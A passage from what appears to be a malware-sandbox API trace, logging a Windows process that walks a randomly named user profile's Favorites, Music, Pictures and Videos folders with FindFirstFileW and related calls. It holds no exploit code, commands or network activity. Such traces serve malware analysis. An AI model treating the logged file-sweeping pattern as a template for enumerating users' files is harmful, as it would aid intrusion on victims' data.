ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0143.203] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0143.203] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0143.203] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.204] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0143.204] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0143.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b630 [0143.204] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0143.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0143.204] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.204] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.204] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.204] PathFindFileNameW (pszPath="") returned="" [0143.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.204] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.206] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0143.206] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0143.206] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0143.206] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0143.206] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0143.206] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0143.206] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0143.206] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0143.206] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.207] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0143.207] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="Windows Live\\" [0143.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b630 [0143.207] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0143.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0143.207] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.207] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.207] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.207] PathFindFileNameW (pszPath="") returned="" [0143.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.207] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.209] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0143.209] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0143.209] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.210] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x681870 [0143.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0143.210] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\hj7NwShkhm0XSrV-KW7t\\") returned="hj7NwShkhm0XSrV-KW7t\\" [0143.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d010 [0143.210] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0143.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0143.210] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.211] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.211] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.211] PathFindFileNameW (pszPath="") returned="" [0143.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x681870 [0143.211] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\hj7NwShkhm0XSrV-KW7t\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b0fa3e0, ftCreationTime.dwHighDateTime=0x1d5dd85, ftLastAccessTime.dwLowDateTime=0x4a3f8b60, ftLastAccessTime.dwHighDateTime=0x1d5e1e0, ftLastWriteTime.dwLowDateTime=0x4a3f8b60, ftLastWriteTime.dwHighDateTime=0x1d5e1e0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.211] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.211] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b970 [0143.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0143.211] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Sen2E\\") returned="Sen2E\\" [0143.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d010 [0143.211] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0143.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0143.211] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.211] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.212] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.212] PathFindFileNameW (pszPath="") returned="" [0143.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b970 [0143.212] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Sen2E\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae260c30, ftCreationTime.dwHighDateTime=0x1d5e7df, ftLastAccessTime.dwLowDateTime=0x264b3170, ftLastAccessTime.dwHighDateTime=0x1d5dc89, ftLastWriteTime.dwLowDateTime=0x264b3170, ftLastWriteTime.dwHighDateTime=0x1d5dc89, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.212] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.212] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x6818f8 [0143.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0143.212] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-r6wNQZbO24NoicX\\") returned="-r6wNQZbO24NoicX\\" [0143.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d010 [0143.212] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0143.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0143.212] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.212] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.212] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.212] PathFindFileNameW (pszPath="") returned="" [0143.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x6818f8 [0143.212] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-r6wNQZbO24NoicX\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe0f9430, ftCreationTime.dwHighDateTime=0x1d5df99, ftLastAccessTime.dwLowDateTime=0x1f216b30, ftLastAccessTime.dwHighDateTime=0x1d5e517, ftLastWriteTime.dwLowDateTime=0x1f216b30, ftLastWriteTime.dwHighDateTime=0x1d5e517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.213] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.213] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0143.213] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6wA8Gw gcJLL8\\") returned="6wA8Gw gcJLL8\\" [0143.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d010 [0143.213] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0143.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0143.213] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.213] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.213] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.213] PathFindFileNameW (pszPath="") returned="" [0143.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.213] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6wA8Gw gcJLL8\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32761cc0, ftCreationTime.dwHighDateTime=0x1d5dea1, ftLastAccessTime.dwLowDateTime=0xcdee66b0, ftLastAccessTime.dwHighDateTime=0x1d5def3, ftLastWriteTime.dwLowDateTime=0xcdee66b0, ftLastWriteTime.dwHighDateTime=0x1d5def3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.214] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.214] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0143.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\79QGps82F52\\") returned="79QGps82F52\\" [0143.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d010 [0143.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0143.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0143.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.214] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.214] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.214] PathFindFileNameW (pszPath="") returned="" [0143.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.214] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\79QGps82F52\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9a7df0d0, ftCreationTime.dwHighDateTime=0x1d5dcf9, ftLastAccessTime.dwLowDateTime=0x17f85810, ftLastAccessTime.dwHighDateTime=0x1d5e6dd, ftLastWriteTime.dwLowDateTime=0x17f85810, ftLastWriteTime.dwHighDateTime=0x1d5e6dd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.214] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.214] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0143.215] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qcnePkOjcCi6\\") returned="qcnePkOjcCi6\\" [0143.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d010 [0143.215] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0143.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0143.215] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.215] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.215] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.215] PathFindFileNameW (pszPath="") returned="" [0143.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.215] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qcnePkOjcCi6\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1519fc50, ftCreationTime.dwHighDateTime=0x1d5e324, ftLastAccessTime.dwLowDateTime=0xa6530b20, ftLastAccessTime.dwHighDateTime=0x1d5e31b, ftLastWriteTime.dwLowDateTime=0xa6530b20, ftLastWriteTime.dwHighDateTime=0x1d5e31b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.215] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.215] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0143.215] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lcr-oiAsOX3Khc\\") returned="lcr-oiAsOX3Khc\\" [0143.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d010 [0143.215] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0143.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0143.215] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.216] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.216] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.216] PathFindFileNameW (pszPath="") returned="" [0143.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.216] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lcr-oiAsOX3Khc\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e7feb40, ftCreationTime.dwHighDateTime=0x1d5d87e, ftLastAccessTime.dwLowDateTime=0xa0f3ab60, 